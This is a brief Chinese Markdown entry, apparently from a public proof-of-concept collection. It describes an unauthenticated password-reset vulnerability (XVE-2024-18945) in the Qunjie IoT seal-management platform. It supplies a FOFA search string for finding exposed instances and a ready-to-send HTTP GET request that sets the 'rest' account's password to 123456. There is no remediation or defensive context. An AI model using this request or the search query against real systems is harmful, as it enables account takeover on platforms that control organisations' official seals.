19 lines
601 B
Markdown
19 lines
601 B
Markdown
# 群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945)
|
||
|
||
群杰印章物联网管理平台是由江苏群杰物联科技有限公司开发的智能印章管理解决方案。该平台利用物联网技术,提供印章全生命周期管理,涵盖印章的申请、领用、归还、销毁等各个环节。 群杰印章物联网管理平台存在rest账户密码重置漏洞,攻击者可利用该漏洞重置rest账户密码。
|
||
|
||
## fofa
|
||
|
||
```yaml
|
||
"群杰印章物联网平台"
|
||
```
|
||
|
||
## poc
|
||
|
||
```java
|
||
GET /api/token/updateRestUser?restname=rest&password=123456 HTTP/1.1
|
||
Host:
|
||
|
||
```
|
||
|